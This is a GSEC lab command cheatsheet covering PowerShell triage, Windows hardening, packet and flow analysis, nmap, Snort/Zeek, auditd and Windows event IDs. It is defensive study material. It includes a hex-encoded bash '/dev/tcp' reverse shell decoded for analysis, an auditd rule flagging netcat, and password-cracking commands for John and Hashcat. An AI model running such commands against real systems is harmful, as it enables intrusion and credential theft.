GSEC CyberLive Cheatsheet

203 commands across 23 tool groups. Print landscape, 8.5pt. Drill each section until automatic.

PowerShell (25)

Command	Purpose	Key flags
Get-Content .\compare-vm-to-alpha-basic-policy.log \| Select-String 'mismatch'	Grep the log with Select-String Lab 5.3 - Applying Windows System Security Policies	Get-Content: read file into pipeline Select-String: pattern match (PowerShell's grep)
Get-Process	Process overview with Get-Process Lab 5.4 - Using PowerShell for Speed and Scale	—
Get-Process -Name explorer \| Select-Object -Property *	Deep property view on a single process Lab 5.4 - Using PowerShell for Speed and Scale	-Name: match by process name Select-Object -Property *: dump every property on the pipeline object
Start-Process notepad.exe	Launch and inspect a process Lab 5.4 - Using PowerShell for Speed and Scale	—
Get-Process -Name notepad \| Select-Object *	Launch and inspect a process Lab 5.4 - Using PowerShell for Speed and Scale	—
$NotepadProc = Get-Process -Name notepad	Capture a process into a variable Lab 5.4 - Using PowerShell for Speed and Scale	—
$NotepadProc	Capture a process into a variable Lab 5.4 - Using PowerShell for Speed and Scale	—
$NotepadProc.kill()	Invoke a method on the stored object Lab 5.4 - Using PowerShell for Speed and Scale	—
Get-Process -Name notepad	Invoke a method on the stored object Lab 5.4 - Using PowerShell for Speed and Scale	—
Get-Service	Enumerate Windows services Lab 5.4 - Using PowerShell for Speed and Scale	—
Get-Service \| Measure-Object	Count services with Measure-Object Lab 5.4 - Using PowerShell for Speed and Scale	—
Get-Service \| Where-Object -Property Status -like Running	Filter services to only those Running Lab 5.4 - Using PowerShell for Speed and Scale	Where-Object: filter pipeline objects by a predicate -Property Status: property to test -like Running: comparison (-like is case-insensitive wildcard)
Get-Service \| Where-Object -Property Status -like Running \| Measure-Object	Count the running services Lab 5.4 - Using PowerShell for Speed and Scale	—
Get-Service \| Out-GridView	Out-GridView for interactive triage Lab 5.4 - Using PowerShell for Speed and Scale	—
Get-Service \| Export-CSV -Path Services.csv	Export to CSV and open in ISE Lab 5.4 - Using PowerShell for Speed and Scale	—
ise .\Services.csv	Export to CSV and open in ISE Lab 5.4 - Using PowerShell for Speed and Scale	—
Get-Alias dir	Directory listing and alias discovery Lab 5.4 - Using PowerShell for Speed and Scale	—
[string[]]$AlphaServers = Get-Content -Path 'C:\sec401\labs\5.4\alpha-servers.txt'	Bootstrap the fleet and load the server list Lab 5.4 - Using PowerShell for Speed and Scale	—
$AlphaServers	Bootstrap the fleet and load the server list Lab 5.4 - Using PowerShell for Speed and Scale	—
$creds = Get-Credential	Invoke-Command across the fleet with credentials Lab 5.4 - Using PowerShell for Speed and Scale	-Authentication Basic: simple auth (lab only — use Kerberos/CredSSP in prod) -Credential: PSCredential object from Get-Credential -ComputerName: array of targets -command { ... }: scriptblock executed on every remote host
invoke-command -Authentication Basic -Credential $creds -ComputerName $AlphaServers -command { Get-CimInstance Win32_OperatingSystem \| Select-Object CSName, Caption } \| Format-Table	Invoke-Command across the fleet with credentials Lab 5.4 - Using PowerShell for Speed and Scale	-Authentication Basic: simple auth (lab only — use Kerberos/CredSSP in prod) -Credential: PSCredential object from Get-Credential -ComputerName: array of targets -command { ... }: scriptblock executed on every remote host
invoke-command -Authentication Basic -Credential $creds -ComputerName $AlphaServers -command { Get-ChildItem C:\Windows\System32\proxy.exe } \| Format-Table	Negative control: probe for a file that doesn't exist Lab 5.4 - Using PowerShell for Speed and Scale	—
invoke-command -Authentication Basic -Credential $creds -ComputerName $AlphaServers -command { Get-ChildItem C:\Windows\*.exe } \| Format-Table	Fleet-wide enumeration of C:\Windows\*.exe Lab 5.4 - Using PowerShell for Speed and Scale	—
Get-WinEvent -FilterHashtable @{LogName='System'; ID=7045} -MaxEvents 3 \| format-list	Correlate with Event ID 7045 (service installed) Lab 5.4 - Using PowerShell for Speed and Scale	-FilterHashtable: server-side XPath-equivalent filter (fast) LogName: which log to query ID=7045: Service Control Manager 'a service was installed' event -MaxEvents 3: cap results
Get-FileHash -Algorithm SHA256 C:\Windows\broker.exe	Hash the suspicious binary for IOC sharing Lab 5.4 - Using PowerShell for Speed and Scale	-Algorithm SHA256: hash algorithm (MD5/SHA1/SHA256/SHA512 supported)

Windows Hardening (secedit / MMC) (6)

Command	Purpose	Key flags
secedit.exe /analyze	Review secedit.exe /analyze syntax Lab 5.3 - Applying Windows System Security Policies	/db: analysis database (.sdb) /cfg: security template file (.inf) /log: output log path /quiet: suppress prompts
secedit.exe /analyze /db alpha-basic-policy.sdb /cfg Alpha-Win-Wkstn-Basic-Sec-Policy.inf /log C:\sec401\labs\5.3\compare-vm-to-alpha-basic-policy.log	Analyze the VM against the Alpha basic template Lab 5.3 - Applying Windows System Security Policies	—
notepad C:\sec401\labs\5.3\compare-vm-to-alpha-basic-policy.log	Open the compare log and scan for Mismatch Lab 5.3 - Applying Windows System Security Policies	—
secedit.exe /configure /db alpha-basic-policy.sdb /log C:\sec401\labs\5.3\apply-apha-basic-policy-to-vm.log	Apply the template with secedit /configure Lab 5.3 - Applying Windows System Security Policies	/configure: apply template settings to the host /db: use the prior analysis database (keeps settings consistent)
secedit.exe /analyze /db alpha-basic-policy.sdb /log C:\sec401\labs\5.3\recompare-vm-to-alpha-basic-policy.log	Re-analyze to verify the drift is gone Lab 5.3 - Applying Windows System Security Policies	—
mmc.exe (File → Add/Remove Snap-in → Security Templates, Security Configuration and Analysis)	Load the MMC snap-ins Lab 5.3 - Applying Windows System Security Policies	—

Linux Permissions (2)

Command	Purpose	Key flags
umask	Read the current umask Lab 6.1 - Linux Permissions	—
umask 0027	Tighten umask to 0027 and retest Lab 6.1 - Linux Permissions	umask 0027: mask bits = user 0, group 2, other 7 Effect: files default to 640, dirs to 750

Linux Core Utilities (43)

Command	Purpose	Key flags
cd /sec401/labs/1.2 && ./lab-1.2 start && sudo wireshark 2>/dev/null &	Lab environment setup Lab 1.2 – Wireshark Packet Analysis	./lab-1.2 start: launch local web server sudo wireshark: root privileges for capture 2>/dev/null &: suppress warnings, run in background
ls /sec401/labs/1.3/20230928/ \| wc -l	List and identify VPC flow log files Lab 1.3 - AWS VPC Flow Log Analysis	wc -l: count files file: identify file type and compression
file /sec401/labs/1.3/20230928/2226771286B0_vpcflowlogs_us-east-2_fl-0272f42338e6eeaaf_20230928T23552_e92fb168.log.gz	List and identify VPC flow log files Lab 1.3 - AWS VPC Flow Log Analysis	wc -l: count files file: identify file type and compression
wc -l /sec401/labs/1.3/attacker-flows.log	Extract attacker flows Lab 1.3 - AWS VPC Flow Log Analysis	zgrep: grep compressed files --no-filename: omit file names from output > redirect to attacker-flows.log
sort -nk 15 /sec401/labs/1.3/attacker-flows.log \| head -1	Determine attack timeframe Lab 1.3 - AWS VPC Flow Log Analysis	sort -nk 15: numeric sort on column 15 (start epoch) date -d @epoch: convert epoch to human-readable
sort -nk 15 /sec401/labs/1.3/attacker-flows.log \| tail -1	Determine attack timeframe Lab 1.3 - AWS VPC Flow Log Analysis	sort -nk 15: numeric sort on column 15 (start epoch) date -d @epoch: convert epoch to human-readable
cat attacker-flows.log \| awk '$10 == "8889"' \| awk '{SUM=SUM+$12} END{print "Total bytes transferred: "SUM}'	Quantify data transfer by port Lab 1.3 - AWS VPC Flow Log Analysis	$10 == "8889": filter by dst port 8889 $9 == "80": filter by dst port 80 $12: bytes field SUM+$12: running total
cat attacker-flows.log \| awk '$9 == "80"' \| awk '{SUM=SUM+$12} END{print "Total bytes transferred: "SUM}'	Quantify data transfer by port Lab 1.3 - AWS VPC Flow Log Analysis	$10 == "8889": filter by dst port 8889 $9 == "80": filter by dst port 80 $12: bytes field SUM+$12: running total
head -1 pcap-derived-netflow.txt; cat pcap-derived-netflow.txt \| grep 20.106.124.93 \| head -2	Filter NetFlow for attacker on port 80 Lab 1.3 - AWS VPC Flow Log Analysis	—
head -1 pcap-derived-netflow.txt; cat pcap-derived-netflow.txt \| grep 20.106.124.93 \| grep -v :80 \| head -2	Filter for attacker SSH traffic Lab 1.3 - AWS VPC Flow Log Analysis	—
head -1 pcap-derived-netflow.txt; cat pcap-derived-netflow.txt \| grep 20.106.124.93 \| grep -v :80 \| grep -v :22 \| head -2	Identify non-standard port activity Lab 1.3 - AWS VPC Flow Log Analysis	grep -v: exclude matches Sequential exclusion isolates unknown services
head -1 pcap-derived-netflow.txt; cat pcap-derived-netflow.txt \| grep 20.106.124.93 \| grep -v :80 \| grep -v :22 \| grep -v :8889 \| head -2	Confirm complete attack surface Lab 1.3 - AWS VPC Flow Log Analysis	—
cd /sec401/labs/2.1/ && ls -l	Explore lab files Lab 2.1 – Password Auditing	ls -l: detailed file listing with sizes file: identify file type and encryption status
file customer-discount.xlsx	Explore lab files Lab 2.1 – Password Auditing	ls -l: detailed file listing with sizes file: identify file type and encryption status
cat excelhash	View extracted Office hash Lab 2.1 – Password Auditing	—
cat alphamerge	Combine Linux passwd and shadow files Lab 2.1 – Password Auditing	unshadow: merge /etc/passwd and /etc/shadow into John-compatible format
wc -l cewl-pass.txt	Verify rule expansion scale Lab 2.1 – Password Auditing	wc -l: count lines (candidates) grep \| wc -l: count variants of a specific word
wc -l cewl-rules.txt	Verify rule expansion scale Lab 2.1 – Password Auditing	wc -l: count lines (candidates) grep \| wc -l: count variants of a specific word
grep merely cewl-rules.txt \| wc -l	Verify rule expansion scale Lab 2.1 – Password Auditing	wc -l: count lines (candidates) grep \| wc -l: count variants of a specific word
cd /media/sec401/CDROM/	Scan removable media for sensitive keywords Lab 2.2 - Data Loss Prevention	-P: Perl-compatible regex (supports alternation with \|) -a: treat binary files as text (needed for .doc/.docx) -i: case-insensitive matching -l: print only filenames, not matching content
grep -Pail '(secret\|confidential\|sensitive)' *	Scan removable media for sensitive keywords Lab 2.2 - Data Loss Prevention	-P: Perl-compatible regex (supports alternation with \|) -a: treat binary files as text (needed for .doc/.docx) -i: case-insensitive matching -l: print only filenames, not matching content
cd /sec401/labs/3.1/ && ./start_3.1.sh	Lab environment startup Lab 3.1 - Network Discovery	—
curl localhost:8000	Retrieve the served page Lab 3.1 - Network Discovery	—
cd /sec401/labs/3.3/ && ./start_3.3.sh	Lab environment startup Lab 3.3 - Web App Exploitation	—
echo "Hello" > test-file.txt && sha256sum test-file.txt && xxd test-file.txt && mv test-file.txt renamed-file.txt && sha256sum renamed-file.txt	Hash is content-based, not name-based Lab 4.1 - Hashing and Cryptographic Validation	echo "Hello" > file: write 6 bytes (Hello\n) to a file sha256sum: compute SHA-256 digest xxd: hex + ASCII dump mv: rename without changing contents
sed -i 's/H/h/g' renamed-file.txt && sha256sum renamed-file.txt	One-byte change, completely different hash Lab 4.1 - Hashing and Cryptographic Validation	sed -i: edit file in place 's/H/h/g': substitute H with h, globally
sed -i 's/HOME_NET = \'any\'/HOME_NET = \'[10.130.0.0/16]\'/' /sec401/labs/4.3/etc/snort.lua	Scope HOME_NET to the lab /16 Lab 4.3 - Intrusion Detection and Network Security Monitoring with Snort3 and Zeek	—
sed -n 7p packet_filter.log \| sed 's/\t/\n/g'	Inspect Zeek log schema Lab 4.3 - Intrusion Detection and Network Security Monitoring with Snort3 and Zeek	sed -n 7p: print line 7 (the #fields header) sed 's/\t/\n/g': convert tabs to newlines for readability
dir	Directory listing and alias discovery Lab 5.4 - Using PowerShell for Speed and Scale	—
dir .\Services.csv \| Format-List *	Inspect a file as an object Lab 5.4 - Using PowerShell for Speed and Scale	—
dir \| Sort-Object CreationTime	Sort directory listing by CreationTime Lab 5.4 - Using PowerShell for Speed and Scale	—
cd /sec401/labs/6.1	Start the Docker lab container Lab 6.1 - Linux Permissions	—
echo annika > test_perms.txt	Create a file with the default umask Lab 6.1 - Linux Permissions	—
cat test_perms.txt	Create a file with the default umask Lab 6.1 - Linux Permissions	—
ls -l test_perms.txt	Create a file with the default umask Lab 6.1 - Linux Permissions	—
echo annika > secure.txt	Tighten umask to 0027 and retest Lab 6.1 - Linux Permissions	umask 0027: mask bits = user 0, group 2, other 7 Effect: files default to 640, dirs to 750
mkdir secure_dir	Tighten umask to 0027 and retest Lab 6.1 - Linux Permissions	umask 0027: mask bits = user 0, group 2, other 7 Effect: files default to 640, dirs to 750
ls -ld secure*	Tighten umask to 0027 and retest Lab 6.1 - Linux Permissions	umask 0027: mask bits = user 0, group 2, other 7 Effect: files default to 640, dirs to 750
ls -ld /tmp	Sticky bit on /tmp Lab 6.1 - Linux Permissions	drwxrwxrwt: d=dir, rwx (user), rwx (group), rwt (other with sticky) t without x would display as T
echo "only annika may rename or delete this file" > /tmp/sticky_bit_test.txt	Sticky bit on /tmp Lab 6.1 - Linux Permissions	drwxrwxrwt: d=dir, rwx (user), rwx (group), rwt (other with sticky) t without x would display as T
ls -l /tmp/sticky_bit_test.txt	Sticky bit on /tmp Lab 6.1 - Linux Permissions	drwxrwxrwt: d=dir, rwx (user), rwx (group), rwt (other with sticky) t without x would display as T
cd /sec401/labs/6.3	Open the auditd rules file Lab 6.3 - Linux Logging and Auditing	—
echo -n 2F7573722F62696E2F62617368002D6300286563686F203C2F6465762F7463702F686F73742E646F636B65722E696E7465726E616C2F333836392920323E2F6465762F6E756C6C2026 \| xxd -r -p ; echo	Decode a hex-encoded reverse shell Lab 6.3 - Linux Logging and Auditing	xxd -r -p: reverse hex to bytes, plain format (no line numbers) -n on echo: no trailing newline

Packet Analysis (tcpdump) (7)

Command	Purpose	Key flags
tcpdump -n -r investigate.pcap -c 20 -#	Initial packet overview Lab 1.1 – tcpdump Traffic Analysis	-n: no DNS/port lookup -r: read from file -c 20: stop after 20 packets -#: print packet number
tcpdump -n -r investigate.pcap 'tcp and (host 135.125.217.54 and host 10.130.8.94) and (port 44366 and port 80)'	Filtering session 1: GET /.env Lab 1.1 – tcpdump Traffic Analysis	Filter: tcp + host/port pair
tcpdump -n -r session.pcap -#	Read session.pcap Lab 1.1 – tcpdump Traffic Analysis	—
tcpdump -n -r session.pcap -X -v -c 4	HTTP payload extraction: visible login parameters Lab 1.1 – tcpdump Traffic Analysis	-X: hex and ASCII payload; -v: verbose; -c 4: stop after 4 packets
tcpdump -n -i eth0 -w created_capture.pcap 'udp port 53'	Live DNS capture and read Lab 1.1 – tcpdump Traffic Analysis	-i: interface; -w: write to file; Filter: udp port 53
tcpdump -n -r created_capture.pcap	Live DNS capture and read Lab 1.1 – tcpdump Traffic Analysis	-i: interface; -w: write to file; Filter: udp port 53
tcpdump -n -r created_capture.pcap -X	DNS payload extraction Lab 1.1 – tcpdump Traffic Analysis	—

DNS / Network Recon (1)

Command	Purpose	Key flags
dig alphainc.ca NS	Correlate with dig Lab 1.1 – tcpdump Traffic Analysis	alphainc.ca: domain; NS: name server

Network Discovery (nmap) (8)

Command	Purpose	Key flags
nmap -sn 172.28.14.0/24	Ping sweep: discover live hosts Lab 3.1 - Network Discovery	-sn: ping scan, no port scan 172.28.14.0/24: 256-address lab subnet
nmap -v --top-ports 100 -oG -	Greppable port sweeps Lab 3.1 - Network Discovery	-v: verbose --top-ports 100: scan the 100 most common TCP ports -F: fast scan (~top 100 from nmap-services) -oG -: greppable output to stdout
nmap -v -F -oG -	Greppable port sweeps Lab 3.1 - Network Discovery	-v: verbose --top-ports 100: scan the 100 most common TCP ports -F: fast scan (~top 100 from nmap-services) -oG -: greppable output to stdout
nmap -sV 172.28.14.0/24	Service and version detection Lab 3.1 - Network Discovery	-sV: probe open ports for service/version info
nmap -O 172.28.14.0/24	OS detection: strict match Lab 3.1 - Network Discovery	-O: OS fingerprinting based on TCP/IP stack behavior
nmap -O --osscan-guess 172.28.14.0/24	OS detection: aggressive guess Lab 3.1 - Network Discovery	--osscan-guess: print closest matches even when no exact match
nmap -sV -oX new_network.xml 172.28.14.0/24	Baseline scan saved to XML Lab 3.1 - Network Discovery	-oX: XML output file
ndiff network.xml new_network.xml	ndiff: detect scan-over-scan change Lab 3.1 - Network Discovery	ndiff: Nmap-aware diff of two XML scans, lines prefixed with + for added and - for removed

IDS / NSM (Snort + Zeek) (6)

Command	Purpose	Key flags
snort -T -c /sec401/labs/4.3/etc/snort.lua	Validate the Snort3 config Lab 4.3 - Intrusion Detection and Network Security Monitoring with Snort3 and Zeek	-T: test configuration and exit -c: path to snort.lua
snort -T -c /sec401/labs/4.3/etc/snort.lua -q	Quiet re-validation Lab 4.3 - Intrusion Detection and Network Security Monitoring with Snort3 and Zeek	-q: quiet mode (suppress banners)
snort -c etc/snort.lua -q -r investigate.pcap -A alert_talos -R rules/snort3-community.rules	PCAP replay with community rules: summary view Lab 4.3 - Intrusion Detection and Network Security Monitoring with Snort3 and Zeek	-r: read from PCAP -A alert_talos: Talos-style summary (grouped) -R: ruleset to load
snort -c etc/snort.lua -q -r investigate.pcap -A alert_fast -R rules/snort3-community.rules	Per-alert detail with alert_fast Lab 4.3 - Intrusion Detection and Network Security Monitoring with Snort3 and Zeek	-A alert_fast: one alert per line (best for piping to grep/awk)
snort -c etc/snort.lua -q -r investigate.pcap -A alert_fast -R rules/snort3-community.rules --bpf 'host 20.106.124.93'	BPF filter to focus the attacker Lab 4.3 - Intrusion Detection and Network Security Monitoring with Snort3 and Zeek	--bpf: Berkeley Packet Filter expression; same syntax as tcpdump
zeek -C -r ../investigate.pcap -f 'host 20.206.124.93' /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek	Zeek: protocol-aware log + file extraction Lab 4.3 - Intrusion Detection and Network Security Monitoring with Snort3 and Zeek	-C: skip checksum validation (PCAP checksums often broken) -r: read from PCAP -f: BPF filter extract-all-files.zeek: reconstruct files from HTTP/FTP/SMB flows

Password Cracking (John + Hashcat) (8)

Command	Purpose	Key flags
john --wordlist=cewl-pass.txt excelhash	Crack Excel password with John Lab 2.1 – Password Auditing	--wordlist=cewl-pass.txt: use CeWL wordlist excelhash: target hash file
john --wordlist=cewl-pass.txt ntlm.txt	NTLM hash type ambiguity Lab 2.1 – Password Auditing	—
john --wordlist=cewl-pass.txt ntlm.txt --format=NT	Crack NTLM hash with correct format Lab 2.1 – Password Auditing	--format=NT: force NTLM (MD4) hash type NT hash = MD4(UTF-16LE(password))
john --format=crypt --wordlist=cewl-pass.txt alphamerge	Crack Linux crypt hash Lab 2.1 – Password Auditing	--format=crypt: use generic Unix crypt format Handles multiple algorithms (md5crypt, sha256crypt, sha512crypt)
hashcat -m 1800 -a 3 alphamerge ?u?l?l?l?l?l?l?l?l?d	Hashcat brute-force attempt on SHA-512 Lab 2.1 – Password Auditing	-m 1800: SHA-512 crypt hash mode -a 3: brute-force/mask attack ?u: uppercase letter ?l: lowercase letter ?d: digit
john --wordlist=cewl-pass.txt bonus_passwords	Bonus challenge: CeWL wordlist fails Lab 2.1 – Password Auditing	unshadow: merge bonus credential files --wordlist: attempt base CeWL wordlist
john --wordlist=cewl-pass.txt --rules --stdout > cewl-rules.txt	Generate mangled wordlist with John rules Lab 2.1 – Password Auditing	--rules: enable default word-mangling rules --stdout: output candidates instead of cracking > cewl-rules.txt: save expanded wordlist
john --wordlist=cewl-rules.txt bonus_passwords	Crack bonus passwords with expanded wordlist Lab 2.1 – Password Auditing	--wordlist=cewl-rules.txt: use rules-expanded 4M-candidate wordlist

Cryptographic Validation (hashing + GPG) (5)

Command	Purpose	Key flags
gpg --full-generate-key	Generate an RSA 3072 GPG key Lab 4.1 - Hashing and Cryptographic Validation	--full-generate-key: full interactive key generation (vs. quick-generate)
gpg --list-keys && gpg --list-secret-keys	Inspect the keyring Lab 4.1 - Hashing and Cryptographic Validation	—
gpg --sign --armor --output renamed-file.txt.asc --detach-sig renamed-file.txt && gpg --verify renamed-file.txt.asc	Sign a file with a detached ASCII-armored signature Lab 4.1 - Hashing and Cryptographic Validation	--sign: sign --armor: ASCII-armored output (.asc, not binary .sig) --detach-sig: signature in a separate file
gpg --import /sec401/labs/4.1/backup/backup-jeffries... && gpg --list-keys	Import a third-party public key Lab 4.1 - Hashing and Cryptographic Validation	—
gpg --verify /media/sec401/CDROM/Bankruptcy.docx.asc	BAD signature: tamper detected Lab 4.1 - Hashing and Cryptographic Validation	—

DLP / Metadata (exiftool + grep) (2)

Command	Purpose	Key flags
exiftool Bankruptcy.docx	Extract document metadata with exiftool Lab 2.2 - Data Loss Prevention	exiftool: read/write metadata in files (EXIF, IPTC, XMP, Office XML) Outputs all metadata fields including Creator, Keywords, Last Modified By
exiftool /media/sec401/CDROM/Bankruptcy.docx	Surface metadata with exiftool Lab 4.1 - Hashing and Cryptographic Validation	—

Cloud (AWS VPC Flow Logs) (2)

Command	Purpose	Key flags
nfpcapd -r /sec401/labs/1.2/investigate.pcap -w exported-netflow/	Convert PCAP to NetFlow with nfpcapd Lab 1.3 - AWS VPC Flow Log Analysis	-r: read PCAP file -w: write NetFlow output directory
nfdump -R exported-netflow/ > pcap-derived-netflow.txt	Analyze NetFlow with nfdump Lab 1.3 - AWS VPC Flow Log Analysis	-R: read recursively from directory

Remote Access (SSH) (1)

Command	Purpose	Key flags
ssh -p 80 root@172.28.14.23	SSH on a non-standard port Lab 3.1 - Network Discovery	-p 80: connect to SSH running on port 80

Lab Bring-up (Docker) (3)

Command	Purpose	Key flags
./start-servers.ps1	Bootstrap the fleet and load the server list Lab 5.4 - Using PowerShell for Speed and Scale	—
./start_6.1.sh	Start the Docker lab container Lab 6.1 - Linux Permissions	—
./connect.sh	Connect into the container as annika Lab 6.1 - Linux Permissions	—

Other Commands (27)

Command	Purpose	Key flags
ip.addr == 20.106.124.93	Display filter construction Lab 1.2 – Wireshark Packet Analysis	ip.addr: match source or destination IP ==: exact match operator
tcp.stream eq 13299	HTTP stream: WordPress brute-force success Lab 1.2 – Wireshark Packet Analysis	tcp.stream: isolate a single TCP conversation eq 13299: stream index from Wireshark's reassembly
http	Live capture analysis with http filter Lab 1.2 – Wireshark Packet Analysis	http: display filter showing only HTTP protocol packets Filters out TCP handshakes, TLS, DNS, etc.
zcat file /sec401/labs/1.3/20230928/2226771286B0_vpcflowlogs_us-east-2_fl-0272f42338e6eeaaf_20230928T23552_e92fb168.log.gz \| head -4	Inspect flow log format and sample records Lab 1.3 - AWS VPC Flow Log Analysis	zcat: decompress and output to stdout head -4: show header + 3 sample records
zcat /sec401/labs/1.3/20230928/*log.gz \| wc -l	Count total flow records Lab 1.3 - AWS VPC Flow Log Analysis	*log.gz: glob all compressed logs wc -l: count total lines
zgrep --no-filename 20.106.124.93 /sec401/labs/1.3/20230928/*log.gz > /sec401/labs/1.3/attacker-flows.log	Extract attacker flows Lab 1.3 - AWS VPC Flow Log Analysis	zgrep: grep compressed files --no-filename: omit file names from output > redirect to attacker-flows.log
date -d @1695921755	Determine attack timeframe Lab 1.3 - AWS VPC Flow Log Analysis	sort -nk 15: numeric sort on column 15 (start epoch) date -d @epoch: convert epoch to human-readable
date -d @1695945545	Determine attack timeframe Lab 1.3 - AWS VPC Flow Log Analysis	sort -nk 15: numeric sort on column 15 (start epoch) date -d @epoch: convert epoch to human-readable
gedit cewl-pass.txt	Examine CeWL wordlist Lab 2.1 – Password Auditing	—
python3 /opt/john/run/office2john.py customer-discount.xlsx > excelhash	Extract Office hash with office2john Lab 2.1 – Password Auditing	office2john.py: extracts password hash from Office documents > excelhash: redirect hash to file for cracking
unshadow alphapasswd alphashadow > alphamerge	Combine Linux passwd and shadow files Lab 2.1 – Password Auditing	unshadow: merge /etc/passwd and /etc/shadow into John-compatible format
unshadow bonuspasswd bonusshadow > bonus_passwords	Bonus challenge: CeWL wordlist fails Lab 2.1 – Password Auditing	unshadow: merge bonus credential files --wordlist: attempt base CeWL wordlist
netstat -anp	Post-compromise: netstat on target Lab 3.1 - Network Discovery	-a: all sockets; -n: numeric addresses; -p: show owning process/PID
iptables -n -L	iptables rules for the new service Lab 3.1 - Network Discovery	-n: numeric output (no DNS/port name lookup) -L: list rules
scripts/enable_waf.sh	Deploy the WAF Lab 3.3 - Web App Exploitation	—
cp /media/sec401/CDROM/Bankruptcy.docx.asc /sec401/labs/4.1/backup/ && gpg --verify /sec401/labs/4.1/backup/Bankruptcy.docx.asc	Restore from backup, re-verify Lab 4.1 - Hashing and Cryptographic Validation	—
gedit audit.rules &	Open the auditd rules file Lab 6.3 - Linux Logging and Auditing	—
# syntax shown:	Review recon / susp_activity / sssd rules Lab 6.3 - Linux Logging and Auditing	-w: watch a path -p x: on execute (r/w/a/x for read/write/attr/exec) -k: key name (aureport/ausearch filter) -a always,exit: rule fires on syscall exit -F: field filter (perm, path, auid) auid!=4294967295: exclude unset audit UID
-w /usr/bin/whoami -p x -k recon	Review recon / susp_activity / sssd rules Lab 6.3 - Linux Logging and Auditing	-w: watch a path -p x: on execute (r/w/a/x for read/write/attr/exec) -k: key name (aureport/ausearch filter) -a always,exit: rule fires on syscall exit -F: field filter (perm, path, auid) auid!=4294967295: exclude unset audit UID
-w /usr/bin/nc -p x -k susp_activity	Review recon / susp_activity / sssd rules Lab 6.3 - Linux Logging and Auditing	-w: watch a path -p x: on execute (r/w/a/x for read/write/attr/exec) -k: key name (aureport/ausearch filter) -a always,exit: rule fires on syscall exit -F: field filter (perm, path, auid) auid!=4294967295: exclude unset audit UID
-a always,exit -F path=/usr/libexec/sssd/p11_child -F perm=x -F auid>=500 -F auid!=4294967295 -k T1078_Valid_Accounts	Review recon / susp_activity / sssd rules Lab 6.3 - Linux Logging and Auditing	-w: watch a path -p x: on execute (r/w/a/x for read/write/attr/exec) -k: key name (aureport/ausearch filter) -a always,exit: rule fires on syscall exit -F: field filter (perm, path, auid) auid!=4294967295: exclude unset audit UID
aureport --input ./audit.log --summary	aureport --summary Lab 6.3 - Linux Logging and Auditing	--input: read from a file instead of /var/log/audit/audit.log --summary: one-screen overview
aureport --input audit.log --key --summary	aureport --key --summary Lab 6.3 - Linux Logging and Auditing	—
ausearch --input audit.log -k sbin_susp	ausearch by key Lab 6.3 - Linux Logging and Auditing	-k: filter by key (same name you set in the -k rule field)
ausearch --input audit.log -k sbin_susp -i	ausearch -i for interpreted output Lab 6.3 - Linux Logging and Auditing	-i: interpret numeric fields (uid/gid → name, epoch → date, syscall numbers → names)
zircolite --events audit.log --ruleset rules/alpha_rules_linux.json --audit	Zircolite: SIGMA over audit.log Lab 6.3 - Linux Logging and Auditing	--events: input log (audit.log, evtx, sysmon) --ruleset: compiled SIGMA JSON --audit: tells Zircolite this is Linux auditd format
gedit detected_events.json &	Review detected_events.json Lab 6.3 - Linux Logging and Auditing	—

Windows Security Event IDs (most tested) (11)

Command	Purpose	Key flags
4624	Successful logon	LogonType in message body (see logon types section)
4625	Failed logon	Status/SubStatus codes indicate failure reason (0xC000006A = bad password, 0xC0000234 = locked)
4634 / 4647	Account logged off / user-initiated logoff	Pair with 4624 to compute session duration
4648	Logon using explicit credentials	runas / lateral movement indicator
4672	Special privileges assigned	Fired at admin-equivalent logon (SeDebug, SeTcb, etc.)
4688	Process creation	Requires command-line auditing GPO to include CommandLine field
4697	Service installed (Security log)	Companion to System log 7045 — use both for service-install hunting
4720 / 4722 / 4724 / 4725	User account created / enabled / pwd reset / disabled	Account lifecycle auditing
4728 / 4732 / 4756	Member added to global / local / universal security group	Privilege escalation indicator
4740	Account locked out	CallerComputerName field shows lockout source
1102	Security log cleared	High-fidelity tampering indicator

Windows System Event IDs (3)

Command	Purpose	Key flags
7045	Service installed (SCM)	Always review on suspicious hosts — pairs with 4697
7036	Service entered Running / Stopped state	Useful for timelining service starts
6005 / 6006 / 6008	Event log started / stopped cleanly / unexpected shutdown	Boot / reboot timeline

Logon Types (4624 / 4625) (9)

Command	Purpose	Key flags
Type 2	Interactive	Keyboard at the console
Type 3	Network	SMB / file share / IPC$
Type 4	Batch	Scheduled task
Type 5	Service	Service start as account
Type 7	Unlock	Unlock of locked workstation
Type 8	NetworkCleartext	Plaintext credentials over network (BASIC auth, IIS)
Type 9	NewCredentials	runas /netonly
Type 10	RemoteInteractive	RDP
Type 11	CachedInteractive	Cached domain creds (laptop offline)

PowerShell one-liners for triage (7)

Command	Purpose	Key flags
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4625} -MaxEvents 50	Last 50 failed logons	-FilterHashtable is server-side and fast; avoid Where-Object after -FilterHashtable Replace 4625 with any ID above
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4624;StartTime=(Get-Date).AddHours(-24)}	Logons in the last 24h	StartTime/EndTime filter in the hashtable
Get-Process \| Where-Object WS -gt 100MB \| Sort WS -desc	Top memory hogs	WS = working set; -gt comparison on numeric property
Get-NetTCPConnection -State Listen \| ft -auto	Listening ports	Replacement for netstat -an; pair with -OwningProcess
Get-CimInstance Win32_Service \| Where State -eq Running \| Select Name,PathName,StartName	Running services + exe path + run-as account	PathName exposes the service binary path StartName is the account (LocalSystem, NetworkService, etc.)
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Run	Autorun keys (per-machine)	Also check HKCU:\... and Run, RunOnce
Get-FileHash -Algorithm SHA256 <path>	Hash a file for IOC sharing	-Algorithm: MD5, SHA1, SHA256 (default), SHA384, SHA512

tcpdump quick filters (7)

Command	Purpose	Key flags
tcpdump -nn -i eth0 -c 100	100 packets, no name resolution	-nn: no DNS, no port lookup -i: interface -c: count
tcpdump -r file.pcap 'host 10.0.0.5'	All traffic to/from one host	src host / dst host to narrow direction
tcpdump -r file.pcap 'port 443'	All traffic on port 443	src port / dst port / portrange 1000-2000
tcpdump -r file.pcap 'tcp[13] & 2 != 0'	SYN packets only (scan detection)	tcp[13]=18 → SYN-ACK, tcp[13]=16 → ACK, tcp[13]=4 → RST
tcpdump -r file.pcap 'icmp[icmptype]=icmp-echo'	ICMP echo requests (ping)	icmp-echoreply for responses
tcpdump -XX -r file.pcap	Hex + ASCII payload dump	-X: hex + ASCII -XX: include link-layer header
tcpdump -r file.pcap -w filtered.pcap 'host 10.0.0.5'	Save filtered subset to new PCAP	-w writes binary PCAP (no -v/-X output)

Wireshark display filters (7)

